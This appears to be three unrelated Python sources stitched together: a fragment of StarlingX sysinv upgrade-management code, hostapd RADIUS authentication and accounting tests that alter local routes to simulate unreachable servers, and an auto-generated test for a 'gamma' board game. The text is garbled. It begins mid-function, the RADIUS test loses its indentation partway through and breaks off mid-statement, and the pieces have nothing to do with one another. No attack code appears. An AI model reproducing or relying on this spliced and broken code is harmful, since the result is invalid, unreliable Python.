                except subprocess.CalledProcessError:
                    raise exception.SysinvException(_(
                        "Failed to call nova cleanup during AIO abort"))

        try:
            vim_api.set_vim_upgrade_state(controller_0, False)
        except Exception:
            # BUGFIX: LOG.exception() requires a message argument; the
            # bare call raised TypeError and masked the original error.
            LOG.exception("Failure clearing VIM host upgrade state")
            raise exception.SysinvException(_(
                "upgrade-abort rejected: unable to reset VIM upgrade "
                "state"))
        LOG.info("Finished upgrade abort")
    else:
        # Completion path: the upgrade must be in COMPLETING.
        if upgrade.state != constants.UPGRADE_COMPLETING:
            raise exception.SysinvException(
                _("Unable to complete upgrade: Upgrade not in %s state.")
                % constants.UPGRADE_COMPLETING)

        # Force all host_upgrade entries to use the new load
        # In particular we may have host profiles created in the from load
        # that we need to update before we can delete the load.
        hosts = self.dbapi.host_upgrade_get_list()
        for host_upgrade in hosts:
            if (host_upgrade.target_load == from_load.id or
                    host_upgrade.software_load == from_load.id):
                LOG.info(_("Updating host id: %s to use load id: %s")
                         % (host_upgrade.forihostid, upgrade.to_load))
                self.dbapi.host_upgrade_update(
                    host_upgrade.id,
                    {"software_load": upgrade.to_load,
                     "target_load": upgrade.to_load})

        # Complete the upgrade
        LOG.info("Completing upgrade from release: %s to release: %s" %
                 (from_version, to_version))
        upgrades_management.complete_upgrade(from_version, to_version)
        LOG.info("Finished completing upgrade")

        # Delete upgrade record
        self.dbapi.software_upgrade_destroy(upgrade.uuid)

    # Clear upgrades alarm (both the abort and completion paths end the
    # upgrade, so the alarm is cleared unconditionally here).
    entity_instance_id = "%s=%s" % (fm_constants.FM_ENTITY_TYPE_HOST,
                                    constants.CONTROLLER_HOSTNAME)
    fm_api.FaultAPIs().clear_fault(
        fm_constants.FM_ALARM_ID_UPGRADE_IN_PROGRESS,
        entity_instance_id)
def abort_upgrade(self, context, upgrade):
    """ Abort the upgrade

    Moves the upgrade into an aborting state (rollback variant if
    controller-0 was already targeted at the new load), restores the
    load states, and regenerates puppet configuration.

    :param context: request context.
    :param upgrade: the software_upgrade DB object.
    :returns: the updated software_upgrade DB object.
    """
    from_load = self.dbapi.load_get(upgrade.from_load)
    from_version = from_load.software_version
    to_load = self.dbapi.load_get(upgrade.to_load)
    to_version = to_load.software_version
    LOG.info("Aborted upgrade from release: %s to release: %s" %
             (from_version, to_version))
    updates = {'state': constants.UPGRADE_ABORTING}

    controller_0 = self.dbapi.ihost_get_by_hostname(
        constants.CONTROLLER_0_HOSTNAME)
    host_upgrade = self.dbapi.host_upgrade_get_by_host(
        controller_0.id)

    # If controller-0 is already targeted at the to-load, aborting
    # requires a rollback rather than a plain abort.
    if host_upgrade.target_load == to_load.id:
        updates['state'] = constants.UPGRADE_ABORTING_ROLLBACK

    rpc_upgrade = self.dbapi.software_upgrade_update(
        upgrade.uuid, updates)
    # make sure the to/from loads are in the correct state
    self.dbapi.set_upgrade_loads_state(
        upgrade,
        constants.IMPORTED_LOAD_STATE,
        constants.ACTIVE_LOAD_STATE)

    # Regenerate configuration to reflect the aborted upgrade.
    self._puppet.update_system_config()
    self._puppet.update_secure_system_config()

    # When we abort from controller-1 while controller-0 is running
    # the previous release, controller-0 will not be aware of the abort.
    # We set the following flag so controller-0 will know we're
    # aborting the upgrade and can set it's database accordingly
    if tsc.system_mode != constants.SYSTEM_MODE_SIMPLEX:
        if updates['state'] == constants.UPGRADE_ABORTING:
            controller_1 = self.dbapi.ihost_get_by_hostname(
                constants.CONTROLLER_1_HOSTNAME)
            c1_host_upgrade = self.dbapi.host_upgrade_get_by_host(
                controller_1.id)
            if utils.is_host_active_controller(controller_1) and \
                    c1_host_upgrade.target_load == to_load.id:
                abort_flag = os.path.join(
                    tsc.PLATFORM_PATH, 'config', from_version,
                    tsc.UPGRADE_ABORT_FILE)
                # Touch the abort flag file for controller-0 to detect.
                open(abort_flag, "w").close()

    return rpc_upgrade
def complete_simplex_backup(self, context, success):
    """Complete the simplex upgrade start process

    Called back after the agent's create_simplex_backup attempt
    (see start_upgrade). On failure the upgrade is aborted and its
    record destroyed; on success the in-progress alarm is raised and
    the upgrade moves to UPGRADE_STARTED.

    :param context: request context.
    :param success: If the create_simplex_backup call completed
    """
    try:
        upgrade = self.dbapi.software_upgrade_get_one()
    except exception.NotFound:
        # Nothing to complete if the record has disappeared.
        LOG.error("Software upgrade record not found")
        return

    from_version = upgrade.from_release
    to_version = upgrade.to_release

    if not success:
        # The upgrade start data collection failed, stop the upgrade
        upgrades_management.abort_upgrade(from_version, to_version,
                                          upgrade)
        # Delete upgrade record
        self.dbapi.software_upgrade_destroy(upgrade.uuid)
        LOG.info("Simplex upgrade start failed")
    else:
        LOG.info("Simplex upgrade start completed")
        # Raise alarm to show an upgrade is in progress
        entity_instance_id = "%s=%s" % (fm_constants.FM_ENTITY_TYPE_HOST,
                                        constants.CONTROLLER_HOSTNAME)
        fault = fm_api.Fault(
            alarm_id=fm_constants.FM_ALARM_ID_UPGRADE_IN_PROGRESS,
            alarm_state=fm_constants.FM_ALARM_STATE_SET,
            entity_type_id=fm_constants.FM_ENTITY_TYPE_HOST,
            entity_instance_id=entity_instance_id,
            severity=fm_constants.FM_ALARM_SEVERITY_MINOR,
            reason_text="System Upgrade in progress.",
            # operational
            alarm_type=fm_constants.FM_ALARM_TYPE_7,
            # congestion
            probable_cause=fm_constants.ALARM_PROBABLE_CAUSE_8,
            proposed_repair_action="No action required.",
            service_affecting=False)
        fm_api.FaultAPIs().set_fault(fault)

        self.dbapi.software_upgrade_update(
            upgrade.uuid, {'state': constants.UPGRADE_STARTED})

    return
def get_system_health(self, context, force=False, upgrade=False):
    """
    Performs a system health check.

    :param context: request context.
    :param force: set to true to ignore minor and warning alarms
    :param upgrade: set to true to perform an upgrade health check
    """
    health_util = health.Health(self.dbapi)
    # Pick the plain or upgrade-specific check, then run it.
    check = (health_util.get_system_health_upgrade
             if upgrade is True
             else health_util.get_system_health)
    return check(context=context, force=force)
def _get_cinder_address_name(self, network_type):
    # Well-known address name used to reserve Cinder's IP on the
    # given network type.
    return "%s-cinder-%s" % (constants.CONTROLLER_HOSTNAME, network_type)
def reserve_ip_for_first_storage_node(self, context):
    """
    Reserve ip address for the first storage node for Ceph monitor
    when installing Ceph as a second backend

    :param context: request context.
    """
    network = self.dbapi.network_get_by_type(constants.NETWORK_TYPE_MGMT)
    address_name = cutils.format_address_name(
        constants.STORAGE_0_HOSTNAME, constants.NETWORK_TYPE_MGMT)
    try:
        # EAFP: a successful lookup means the address already exists.
        self.dbapi.address_get_by_name(address_name)
        # BUGFIX: corrected "Addres" typo in the debug message.
        LOG.debug("Address %s already reserved, continuing." % address_name)
    except exception.AddressNotFoundByName:
        LOG.debug("Reserving address for %s." % address_name)
        self._allocate_pool_address(None, network.pool_uuid,
                                    address_name)
        self._generate_dnsmasq_hosts_file()
def reserve_ip_for_cinder(self, context):
    """
    Reserve ip address for Cinder's services

    :param context: request context.
    """
    # Cinder's IP address is only valid if LVM backend exists
    if not StorageBackendConfig.has_backend(self.dbapi,
                                            constants.CINDER_BACKEND_LVM):
        return

    network = self.dbapi.network_get_by_type(constants.NETWORK_TYPE_MGMT)
    address_name = self._get_cinder_address_name(constants.NETWORK_TYPE_MGMT)

    # Reserve new ip address, if not present
    try:
        self.dbapi.address_get_by_name(address_name)
    except exception.NotFound:
        self._allocate_pool_address(None, network.pool_uuid, address_name)
        self._generate_dnsmasq_hosts_file()
def host_load_matches_sw_version(self, host):
    """
    Checks if the host is running the same load as the active controller

    :param host: a host object
    :return: true if host target load matches active sw_version
    """
    upgrade_entry = self.dbapi.host_upgrade_get_by_host(host.id)
    target = self.dbapi.load_get(upgrade_entry.target_load)
    return target.software_version == tsc.SW_VERSION
def create_barbican_secret(self, context, name, payload):
    """Calls Barbican API to create a secret

    :param context: request context.
    :param name: secret name
    :param payload: secret payload
    """
    # Pure delegation to the OpenStack helper.
    self._openstack.create_barbican_secret(
        context=context, name=name, payload=payload)
def delete_barbican_secret(self, context, name):
    """Calls Barbican API to delete a secret

    :param context: request context.
    :param name: secret name
    """
    # Pure delegation to the OpenStack helper.
    self._openstack.delete_barbican_secret(
        context=context, name=name)
| |
# RADIUS tests
# Copyright (c) 2013-2016, <NAME> <<EMAIL>>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip, require_under_vm, skip_with_fips, fail_test
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
    """Associate *dev* with *ssid* using WPA2-Enterprise EAP-PSK."""
    dev.connect(ssid,
                key_mgmt="WPA-EAP",
                eap="PSK",
                identity="<EMAIL>",
                password_hex="<PASSWORD>",
                scan_freq="2412",
                wait_connect=wait_connect)
def test_radius_auth_unreachable(dev, apdev):
    """RADIUS Authentication server unreachable"""
    # Point the AP at a port where no RADIUS server is listening.
    params = hostapd.wpa2_eap_params(ssid="radius-auth")
    params['auth_server_port'] = "18139"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    connect(dev[0], "radius-auth", wait_connect=False)
    if dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"]) is None:
        raise Exception("Timeout on EAP start")
    logger.info("Checking for RADIUS retries")
    time.sleep(4)
    counters = hapd.get_mib()
    if "radiusAuthClientAccessRequests" not in counters:
        raise Exception("Missing MIB fields")
    if int(counters["radiusAuthClientAccessRetransmissions"]) < 1:
        raise Exception("Missing RADIUS Authentication retransmission")
    if int(counters["radiusAuthClientPendingRequests"]) < 1:
        raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
    """RADIUS Authentication server unreachable (2)"""
    # Route the server address via lo while hostapd starts, then drop the
    # route so the server becomes unreachable.
    subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
    params = hostapd.wpa2_eap_params(ssid="radius-auth")
    params['auth_server_addr'] = "192.168.213.17"
    params['auth_server_port'] = "18139"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
    connect(dev[0], "radius-auth", wait_connect=False)
    if dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"]) is None:
        raise Exception("Timeout on EAP start")
    logger.info("Checking for RADIUS retries")
    time.sleep(4)
    counters = hapd.get_mib()
    if "radiusAuthClientAccessRequests" not in counters:
        raise Exception("Missing MIB fields")
    if int(counters["radiusAuthClientAccessRetransmissions"]) < 1:
        raise Exception("Missing RADIUS Authentication retransmission")
def test_radius_auth_unreachable3(dev, apdev):
    """RADIUS Authentication server initially unreachable, but then available"""
    # Blackhole the auth server address so the first attempt fails.
    subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
    params = hostapd.wpa2_eap_params(ssid="radius-auth")
    params['auth_server_addr'] = "192.168.213.18"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    connect(dev[0], "radius-auth", wait_connect=False)
    if dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"]) is None:
        raise Exception("Timeout on EAP start")
    # Restore reachability and switch hostapd to a working local server.
    subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
    time.sleep(0.1)
    dev[0].request("DISCONNECT")
    hapd.set('auth_server_addr_replace', '127.0.0.1')
    dev[0].request("RECONNECT")
    dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
    """RADIUS Accounting server unreachable"""
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    # Accounting server on a port where nothing listens.
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "18139"
    params['acct_server_shared_secret'] = "radius"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    connect(dev[0], "radius-acct")
    logger.info("Checking for RADIUS retries")
    time.sleep(4)
    counters = hapd.get_mib()
    if "radiusAccClientRetransmissions" not in counters:
        raise Exception("Missing MIB fields")
    if int(counters["radiusAccClientRetransmissions"]) < 2:
        raise Exception("Missing RADIUS Accounting retransmissions")
    if int(counters["radiusAccClientPendingRequests"]) < 2:
        raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
    """RADIUS Accounting server unreachable(2)"""
    # Route the server address via lo while hostapd starts, then drop the
    # route so the accounting server becomes unreachable.
    subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "192.168.213.17"
    params['acct_server_port'] = "18139"
    params['acct_server_shared_secret'] = "radius"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
    connect(dev[0], "radius-acct")
    logger.info("Checking for RADIUS retries")
    time.sleep(4)
    counters = hapd.get_mib()
    if "radiusAccClientRetransmissions" not in counters:
        raise Exception("Missing MIB fields")
    retrans = int(counters["radiusAccClientRetransmissions"])
    pending = int(counters["radiusAccClientPendingRequests"])
    if retrans < 1 and pending < 1:
        raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
    """RADIUS Accounting server initially unreachable, but then available"""
    # Needs to manipulate routing; only safe inside the test VM.
    require_under_vm()
    # Blackhole the accounting server address so requests time out.
    subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
    as_hapd = hostapd.Hostapd("as")
    as_mib_start = as_hapd.get_mib(param="radius_server")
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "192.168.213.18"
    params['acct_server_port'] = "1813"
    params['acct_server_shared_secret'] = "radius"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    connect(dev[0], "radius-acct")
    # Remove the blackhole and point hostapd at the local server instead.
    subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
    time.sleep(0.1)
    dev[0].request("DISCONNECT")
    hapd.set('acct_server_addr_replace', '127.0.0.1')
    dev[0].request("RECONNECT")
    dev[0].wait_connected()
    time.sleep(1)
    # After recovery the server should have produced more responses.
    as_mib_end = as_hapd.get_mib(param="radius_server")
    req_s = int(as_mib_start['radiusAccServTotalResponses'])
    req_e = int(as_mib_end['radiusAccServTotalResponses'])
    if req_e <= req_s:
        raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
    """RADIUS Accounting server unreachable and multiple STAs"""
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "18139"
    params['acct_server_shared_secret'] = "radius"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    # Repeated connect/disconnect cycles pile up accounting requests for
    # many station sessions against the unreachable server.
    for _ in range(20):
        connect(dev[0], "radius-acct")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
    """RADIUS Accounting"""
    # Snapshot server-side counters so the deltas can be checked at the end.
    as_hapd = hostapd.Hostapd("as")
    as_mib_start = as_hapd.get_mib(param="radius_server")
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "1813"
    params['acct_server_shared_secret'] = "radius"
    # Extra attributes to include in Access-Request/Accounting-Request frames.
    params['radius_auth_req_attr'] = [ "126:s:Operator", "77:s:testing" ]
    params['radius_acct_req_attr'] = [ "126:s:Operator", "77:s:testing" ]
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    # Three stations, each with a different EAP method.
    connect(dev[0], "radius-acct")
    dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="PAX", identity="test-class",
                   password_hex="<PASSWORD>")
    dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
                   eap="GPSK", identity="gpsk-cui",
                   password="<PASSWORD>",
                   scan_freq="2412")
    logger.info("Checking for RADIUS counters")
    count = 0
    # Poll (up to ~1 s) until an Accounting-Response per station is seen.
    while True:
        mib = hapd.get_mib()
        if int(mib['radiusAccClientResponses']) >= 3:
            break
        time.sleep(0.1)
        count += 1
        if count > 10:
            raise Exception("Did not receive Accounting-Response packets")

    if int(mib['radiusAccClientRetransmissions']) > 0:
        raise Exception("Unexpected Accounting-Request retransmission")

    # Verify the server observed the expected request/accept deltas.
    as_mib_end = as_hapd.get_mib(param="radius_server")
    req_s = int(as_mib_start['radiusAccServTotalRequests'])
    req_e = int(as_mib_end['radiusAccServTotalRequests'])
    if req_e < req_s + 2:
        raise Exception("Unexpected RADIUS server acct MIB value")
    acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
    acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
    if acc_e < acc_s + 1:
        raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_non_ascii_ssid(dev, apdev):
    """RADIUS Accounting and non-ASCII SSID"""
    params = hostapd.wpa2_eap_params()
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "1813"
    params['acct_server_shared_secret'] = "radius"
    # SSID supplied in hex form (ssid2) rather than as a plain string.
    hex_ssid = "740665007374"
    params['ssid2'] = hex_ssid
    hostapd.add_ap(apdev[0], params)
    dev[0].connect(ssid2=hex_ssid,
                   key_mgmt="WPA-EAP",
                   eap="PSK",
                   identity="<EMAIL>",
                   password_hex="<PASSWORD>",
                   scan_freq="2412")
def test_radius_acct_pmksa_caching(dev, apdev):
    """RADIUS Accounting with PMKSA caching"""
    # Snapshot server-side counters so the deltas can be checked at the end.
    as_hapd = hostapd.Hostapd("as")
    as_mib_start = as_hapd.get_mib(param="radius_server")
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "1813"
    params['acct_server_shared_secret'] = "radius"
    hapd = hostapd.add_ap(apdev[0], params)
    connect(dev[0], "radius-acct")
    dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="PAX", identity="test-class",
                   password_hex="<PASSWORD>")
    # Reassociate both stations; with PMKSA caching this creates new
    # accounting sessions without a fresh full EAP exchange.
    for d in [ dev[0], dev[1] ]:
        d.request("REASSOCIATE")
        d.wait_connected(timeout=15, error="Reassociation timed out")
    count = 0
    # Poll (up to ~1 s) for the expected number of Accounting-Responses.
    while True:
        mib = hapd.get_mib()
        if int(mib['radiusAccClientResponses']) >= 4:
            break
        time.sleep(0.1)
        count += 1
        if count > 10:
            raise Exception("Did not receive Accounting-Response packets")
    if int(mib['radiusAccClientRetransmissions']) > 0:
        raise Exception("Unexpected Accounting-Request retransmission")
    # Verify the server observed the expected request/accept deltas.
    as_mib_end = as_hapd.get_mib(param="radius_server")
    req_s = int(as_mib_start['radiusAccServTotalRequests'])
    req_e = int(as_mib_end['radiusAccServTotalRequests'])
    if req_e < req_s + 2:
        raise Exception("Unexpected RADIUS server acct MIB value")
    acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
    acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
    if acc_e < acc_s + 1:
        raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
    """RADIUS Accounting interim update"""
    as_hapd = hostapd.Hostapd("as")
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "1813"
    params['acct_server_shared_secret'] = "radius"
    params['radius_acct_interim_interval'] = "1"
    hostapd.add_ap(apdev[0], params)
    hapd = hostapd.Hostapd(apdev[0]['ifname'])
    connect(dev[0], "radius-acct")
    logger.info("Checking for RADIUS counters")
    before = as_hapd.get_mib(param="radius_server")
    # With a 1 s interim interval, at least three more accounting
    # requests should arrive within ~3 seconds.
    time.sleep(3.1)
    after = as_hapd.get_mib(param="radius_server")
    requests_before = int(before['radiusAccServTotalRequests'])
    requests_after = int(after['radiusAccServTotalRequests'])
    if requests_after < requests_before + 3:
        raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable(dev, apdev):
    """RADIUS Accounting interim update with unreachable server"""
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "18139"
    params['acct_server_shared_secret'] = "radius"
    params['radius_acct_interim_interval'] = "1"
    hapd = hostapd.add_ap(apdev[0], params)
    start = hapd.get_mib()
    connect(dev[0], "radius-acct")
    # BUGFIX: corrected "interium" typo in the log message.
    logger.info("Waiting for interim accounting updates")
    time.sleep(3.1)
    end = hapd.get_mib()
    # Each interim update against the dead server should register a timeout.
    req_s = int(start['radiusAccClientTimeouts'])
    req_e = int(end['radiusAccClientTimeouts'])
    if req_e < req_s + 2:
        raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
    """RADIUS Accounting interim update with unreachable server (retry)"""
    params = hostapd.wpa2_eap_params(ssid="radius-acct")
    # Port with no listener: every accounting message will time out.
    params['acct_server_addr'] = "127.0.0.1"
    params['acct_server_port'] = "18139"
    params['acct_server_shared_secret'] = "radius"
    # Use long enough interim update interval to allow RADIUS retransmission
    # case (3 seconds) to trigger first.
    params['radius_acct_interim_interval'] = "4"
    hapd = hostapd.add_ap(apdev[0], params)
    start = hapd.get_mib()
    connect(dev[0], "radius-acct")
    # Fix: log message typo "interium" -> "interim".
    logger.info("Waiting for interim accounting updates")
    time.sleep(7.5)
    end = hapd.get_mib()
    req_s = int(start['radiusAccClientTimeouts'])
    req_e = int(end['radiusAccClientTimeouts'])
    if req_e < req_s + 2:
        raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
    """RADIUS Accounting and Framed-IP-Address"""
    try:
        _test_radius_acct_ipaddr(dev, apdev)
    finally:
        # Tear down the bridge the test created. Fix: the original opened
        # /dev/null twice without closing it, leaking a file descriptor per
        # call; use a single context-managed handle instead.
        with open('/dev/null', 'w') as devnull:
            subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
                            stderr=devnull)
            subprocess.call(['brctl', 'delbr', 'ap-br0'],
                            stderr=devnull)
def _test_radius_acct_ipaddr(dev, apdev):
    # Bring up an open AP on bridge ap-br0 with proxy ARP enabled, then inject
    # a DHCP ACK on the bridge via DATA_TEST_FRAME so the AP learns the
    # station's IP address. Cleanup of ap-br0 is done by the caller
    # (test_radius_acct_ipaddr).
    params = { "ssid": "radius-acct-open",
               'acct_server_addr': "127.0.0.1",
               'acct_server_port': "1813",
               'acct_server_shared_secret': "radius",
               'proxy_arp': '1',
               'ap_isolate': '1',
               'bridge': 'ap-br0' }
    # no_enable=True: configure first, enable below so a failure can be
    # converted into a test skip.
    hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
    try:
        hapd.enable()
    except:
        # For now, do not report failures due to missing kernel support
        raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
    bssid = apdev[0]['bssid']
    # Zero the bridge forwarding delay so frames pass immediately.
    subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
    subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
    dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
    addr0 = dev[0].own_addr()
    # Fake DHCP server response assigning 192.168.1.123 to the station.
    pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
                         ip_src="192.168.1.1", ip_dst="255.255.255.255",
                         yiaddr="192.168.1.123", chaddr=addr0)
    # NOTE(review): binascii.hexlify() returns bytes on Python 3; this str
    # concatenation assumes Python 2 semantics - confirm interpreter version.
    if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt)):
        raise Exception("DATA_TEST_FRAME failed")
    dev[0].request("DISCONNECT")
    dev[0].wait_disconnected()
    hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
    """Send a RADIUS request and verify the response code (and Error-Cause)."""
    reply = srv.SendPacket(req)
    logger.debug("RADIUS response from hostapd")
    for attr in reply.keys():
        logger.debug("%s: %s" % (attr, reply[attr]))
    if reply.code != code:
        raise Exception("Unexpected response code")
    # Error-Cause is only validated when the caller expects one.
    if not error_cause:
        return
    if 'Error-Cause' not in reply:
        raise Exception("Missing Error-Cause")
    if reply['Error-Cause'][0] != error_cause:
        raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
    """RADIUS Accounting - PSK"""
    as_hapd = hostapd.Hostapd("as")
    params = hostapd.wpa2_params(ssid="radius-acct", passphrase="<PASSWORD>")
    # Route accounting to the local RADIUS server instance.
    params.update({'acct_server_addr': "127.0.0.1",
                   'acct_server_port': "1813",
                   'acct_server_shared_secret': "radius"})
    hapd = hostapd.add_ap(apdev[0], params)
    dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
    """RADIUS Accounting - PSK SHA256"""
    as_hapd = hostapd.Hostapd("as")
    params = hostapd.wpa2_params(ssid="radius-acct", passphrase="<PASSWORD>")
    # Restrict key management to the SHA256-based PSK AKM.
    params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
    params.update({'acct_server_addr': "127.0.0.1",
                   'acct_server_port': "1813",
                   'acct_server_shared_secret': "radius"})
    hapd = hostapd.add_ap(apdev[0], params)
    dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
                   psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
    """RADIUS Accounting - FT-PSK"""
    as_hapd = hostapd.Hostapd("as")
    params = ft_params1(ssid="radius-acct", passphrase="<PASSWORD>")
    # Route accounting to the local RADIUS server instance.
    params.update({'acct_server_addr': "127.0.0.1",
                   'acct_server_port': "1813",
                   'acct_server_shared_secret': "radius"})
    hapd = hostapd.add_ap(apdev[0], params)
    dev[0].connect("radius-acct", key_mgmt="FT-PSK",
                   psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = | |
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 148810660
"""
"""
random actions, total chaos
"""
board = gamma_new(7, 8, 5, 5)
assert board is not None
assert gamma_move(board, 2, 1, 4) == 1
assert gamma_move(board, 2, 6, 5) == 1
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 1, 0) == 1
assert gamma_move(board, 3, 0, 1) == 1
assert gamma_move(board, 4, 2, 6) == 1
assert gamma_free_fields(board, 4) == 51
assert gamma_move(board, 5, 4, 4) == 1
assert gamma_move(board, 5, 3, 1) == 1
assert gamma_move(board, 1, 3, 6) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 3, 5, 7) == 1
assert gamma_busy_fields(board, 3) == 3
assert gamma_move(board, 4, 5, 1) == 1
assert gamma_move(board, 4, 0, 0) == 1
assert gamma_move(board, 5, 2, 3) == 1
assert gamma_move(board, 5, 3, 0) == 1
assert gamma_move(board, 1, 5, 4) == 1
assert gamma_move(board, 2, 7, 1) == 0
assert gamma_move(board, 2, 0, 0) == 0
assert gamma_free_fields(board, 2) == 42
assert gamma_move(board, 3, 2, 1) == 1
assert gamma_move(board, 3, 1, 2) == 1
assert gamma_move(board, 4, 5, 5) == 1
assert gamma_move(board, 4, 6, 6) == 1
assert gamma_move(board, 1, 1, 6) == 1
assert gamma_busy_fields(board, 1) == 3
assert gamma_free_fields(board, 2) == 37
assert gamma_move(board, 3, 2, 0) == 1
assert gamma_move(board, 4, 5, 3) == 0
assert gamma_move(board, 4, 0, 1) == 0
board331349876 = gamma_board(board)
assert board331349876 is not None
assert board331349876 == (".....3.\n"
".141..4\n"
".....42\n"
".2..51.\n"
"..5....\n"
".3.....\n"
"3.35.4.\n"
"4335...\n")
del board331349876
board331349876 = None
assert gamma_move(board, 5, 4, 1) == 1
assert gamma_golden_possible(board, 5) == 1
assert gamma_golden_move(board, 5, 0, 2) == 0
assert gamma_move(board, 1, 3, 0) == 0
assert gamma_move(board, 1, 4, 0) == 1
assert gamma_move(board, 2, 1, 6) == 0
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_free_fields(board, 3) == 34
assert gamma_move(board, 5, 6, 0) == 1
assert gamma_move(board, 1, 7, 4) == 0
assert gamma_move(board, 1, 0, 5) == 1
assert gamma_golden_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 3, 7) == 1
assert gamma_move(board, 3, 1, 5) == 1
assert gamma_move(board, 3, 6, 2) == 0
assert gamma_busy_fields(board, 3) == 7
assert gamma_free_fields(board, 3) == 8
assert gamma_move(board, 4, 2, 5) == 1
assert gamma_move(board, 4, 4, 2) == 0
assert gamma_golden_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 6, 5) == 0
